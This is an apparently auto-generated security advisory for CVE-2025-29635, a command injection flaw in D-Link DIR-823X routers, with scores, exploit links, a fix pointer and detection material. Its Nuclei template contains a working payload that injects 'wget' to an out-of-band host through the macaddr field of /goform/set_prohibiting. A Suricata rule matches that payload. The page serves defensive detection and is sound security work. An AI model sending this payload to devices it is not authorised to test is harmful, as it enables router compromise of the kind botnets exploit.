CVE-2025-29635: D-Link DIR-823X Command Injection Vulnerability
Advisory generated from the CVE record, CISA, Exploit Observer and VEDAS: what it is, whether it is exploited, who is affected, and how to fix and detect it.
Generated by VEDAS. Scores as of 2026-11-01 19:19 UTC. Rebuilt every few hours from cve-scores, CISA KEV and vedas-signatures. How this works and its limits.
What it is
A command injection vulnerability in D-Link DIR-823X 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /goform/set_prohibiting via the corresponding function, triggering remote command execution.
Description quoted from the CVE record (assigned by mitre, published 2025-03-25).
Weakness: CWE-77 Improper Neutralization of Special Elements used in a Command (‘Command Injection’)
How it can be exploited
Exploitable over the network with low attack complexity needing high privileges and no user interaction. Impact: confidentiality high, integrity high, availability high. CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CISA assessment (SSVC): CISA assesses exploitation as active. Automatable: no. Technical impact: total.
- On CISA KEV since
- 2026-04-24
- US federal deadline
- 2026-05-08
- Ransomware use
- Not known
Public exploit evidence (Exploit Observer)
Also known as: BDU:2025-05178, CNNVD-202503-2933, CNVD-2025-11330, EUVD-2025-14821, GHSA-m9wc-3h85-pp63
VEDAS cluster: VEDAS:FLIRTYFOX
Exploit Observer links 7 pieces of public exploit code or detection modules that name this CVE or one of its aliases.
Exploit code and modules (7)
Code that names this CVE. A repository can be a working exploit, a scanner, a fake or malware; read it before running anything.
- Nuclei template: https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2025/CVE-2025-29635.yaml
- Code repository: https://github.com/d-link-sa/cve-2025-29635
- Code repository: https://raw.githubusercontent.com/ARPSyndicate/vedas-signatures/main/nuclei/2025/CVE-2025-29635.yaml
- Code repository: https://raw.githubusercontent.com/ARPSyndicate/vedas-signatures/main/nuclei/2025/CVE-2025-29635.yaml
- Code repository: https://raw.githubusercontent.com/ARPSyndicate/vedas-signatures/main/suricata/2025/CVE-2025-29635.rules
- Code repository: https://raw.githubusercontent.com/ARPSyndicate/vedas-signatures/main/suricata/2025/CVE-2025-29635.rules
- Code repository: https://raw.githubusercontent.com/ARPSyndicate/vedas-signatures/main/suricata/2025/CVE-2025-29635.rules
Research and write-ups (1)
- Research or write-up: https://www.akamai.com/blog/security-research/2026/apr/cve-2025-29635-mirai-campaign-targets-d-link-devices
Vulnerability databases and vendor advisories (7)
Catalogue entries, not exploit evidence.
- Vulnerability database or vendor advisory: https://access.redhat.com/security/cve/cve-2025-29635
- Vulnerability database or vendor advisory: https://euvd.enisa.europa.eu/enisa/EUVD-2025-14821
- Vulnerability database or vendor advisory: https://github.com/advisories/GHSA-m9wc-3h85-pp63
- Vulnerability database or vendor advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-29635
- Vulnerability database or vendor advisory: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-29635
- Vulnerability database or vendor advisory: https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202503-2933
- Vulnerability database or vendor advisory: https://www.cnvd.org.cn/flaw/show/CNVD-2025-11330
News (1)
15 more references returned by Exploit Observer did not name this CVE or an alias, so they are left out.
VEDAS data as of 2026-11-01T17:12 UTC; fetched 2026-11-02.
Live scores
- EPSS
- 0.879
very likely to be attacked soon - VEDAS
- 0.982
strong exploit evidence - On CISA KEV
- Yes, since 2026-04-24
Thin horizontal line: the “likely” (EPSS 0.10) or “strong” (VEDAS 0.90) threshold. Shaded “no data” areas are periods when cve-scores did not publish. The vertical line is the day CISA added it to its exploited list.
Who is affected
| Product | Affected | Not affected |
|---|---|---|
| Not stated | version n/a | Not stated |
Version ranges exactly as the CVE record states them. “Before X” means X is the first fixed version.
How to fix it
CISA required action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Vendor guidance:
- https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10469
- https://nvd.nist.gov/vuln/detail/CVE-2025-29635
How to detect it
Nuclei template (active check)
Dlink - Command Injection
A command injection vulnerability in D-Link DIR-823X 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /goform/set_prohibiting via the corresponding function, triggering remote command execution.
Name and description quoted from the template, written by VEDAS.
The template sends 2 requests (GET /, POST /goform/set_prohibiting); it confirms through an out-of-band callback (interactsh), so the scanner must be able to receive it; it decides using dsl matchers. Severity in the template: high. Marked as not yet verified against a live vulnerable target.
Run it against a host you own or are authorised to test:
nuclei -u https://your-host -t CVE-2025-29635.yamlShow the template (51 lines)
id: CVE-2025-29635
info:
name: "Dlink - Command Injection"
author: vedas-arpsyndicate
severity: high
description: |
A command injection vulnerability in D-Link DIR-823X 240126 and 240802 allows an authorized attacker to
execute arbitrary commands on remote devices by sending a POST request to /goform/set_prohibiting via the
corresponding function, triggering remote command execution.
reference:
- https://www.exploit.observer/?keyword=CVE-2025-29635&match=exact
- https://subdomain.center/?engine=ammonites&keyword=dlink&match=exact
classification:
cvss-score: 7.2
cve-id: CVE-2025-29635
cwe-id: CWE-78
metadata:
verified: false
tags: cve,cve2025,dlink,rce,kev,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "contains(to_lower(body), 'dir-823')"
internal: true
- raw:
- |
POST /goform/set_prohibiting HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
macaddr=||wget http://{{interactsh-url}}||&token=00000000000000000000000000000000
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- "status_code == 200"
condition: and
Suricata rules (network detection)
1 rule that alert on traffic matching this exploit: VEDAS CVE-2025-29635 Dlink - Command Injection. Add them to your Suricata rule set and reload.
Show the rules
alert http $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"VEDAS CVE-2025-29635 Dlink - Command Injection"; flow:established,to_server; http.uri; content:"set_prohibiting"; nocase; http.request_body; content:"http://"; nocase; fast_pattern; classtype:web-application-attack; reference:cve,CVE-2025-29635; reference:url,https://www.exploit.observer/?keyword=CVE-2025-29635&match=exact; reference:url,https://subdomain.center/?engine=ammonites&keyword=dlink&match=exact; sid:1011491; rev:1;)
CVE-2025-29635.rules on GitHub
References
Exploits and technical analysis
- https://www.akamai.com/blog/security-research/2026/apr/cve-2025-29635-mirai-campaign-targets-d-link-devices (third-party-advisory)
Government sources
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-29635 (government-resource)
Other references
Other databases
Where this comes from
This advisory is generated automatically by VEDAS from: CVE.org record, CISA KEV, cve-scores (EPSS and VEDAS), Exploit Observer, vedas-signatures. Text in quotes is reproduced from the source; everything else is a fixed template filled with source fields. Nothing here is written by a language model. Check the vendor advisory before acting, and read how VEDAS and Exploit Observer work, and their limits.